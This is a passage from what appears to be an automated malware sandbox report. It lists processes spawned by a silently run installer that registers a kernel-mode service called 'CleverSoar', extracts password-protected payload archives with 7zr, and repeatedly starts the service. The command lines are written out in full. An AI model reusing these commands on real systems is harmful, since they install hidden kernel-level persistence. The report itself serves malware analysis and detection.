                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:4
                      Start time:03:35:04
                      Start date:22/12/2024
                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Imagebase:0x7ff693ab0000
                      File size:496'640 bytes
                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                      Has elevated privileges:true
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Target ID:5
                      Start time:03:35:06
                      Start date:22/12/2024
                      Path:C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
                      Imagebase:0x240000
                      File size:5'694'753 bytes
                      MD5 hash:44728E21199D2B04A4B25798625AC86E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Reputation:low
                      Has exited:false

                      Target ID:6
                      Start time:03:35:06
                      Start date:22/12/2024
                      Path:C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
                      Imagebase:0xcd0000
                      File size:3'366'912 bytes
                      MD5 hash:CCFB5265302C0ED10D4EE3C9C00B07B1
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:Borland Delphi
                      Antivirus matches:
                      • Detection: 0%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:8
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:9
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:10
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                      Wow64 process (32bit):true
                      Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                      Imagebase:0x380000
                      File size:831'200 bytes
                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Antivirus matches:
                      • Detection: 0%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      Target ID:11
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:12
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Program Files (x86)\Windows NT\7zr.exe
                      Wow64 process (32bit):true
                      Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                      Imagebase:0x380000
                      File size:831'200 bytes
                      MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:13
                      Start time:03:35:09
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      Target ID:14
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:15
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:16
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:17
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:18
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:19
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:20
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:21
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:22
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:23
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:24
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:25
                      Start time:03:35:10
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:26
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:27
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:28
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:29
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:30
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:31
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:32
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:33
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:34
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:35
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:36
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:37
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:38
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:39
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:40
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:41
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:42
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:43
                      Start time:03:35:11
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:44
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:45
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:46
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:47
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:48
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:49
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:50
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:51
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:52
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:53
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:54
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:55
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:56
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:57
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:58
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:59
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:60
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:61
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:62
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:63
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:64
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:65
                      Start time:03:35:12
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:66
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:67
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7699e0000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:68
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:cmd /c start sc start CleverSoar
                      Imagebase:0x7ff6563a0000
                      File size:289'792 bytes
                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:69
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\sc.exe
                      Wow64 process (32bit):false
                      Commandline:sc start CleverSoar
                      Imagebase:0x7ff6a2270000
                      File size:72'192 bytes
                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Has exited:true

                      Target ID:70
                      Start time:03:35:13
                      Start date:22/12/2024
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
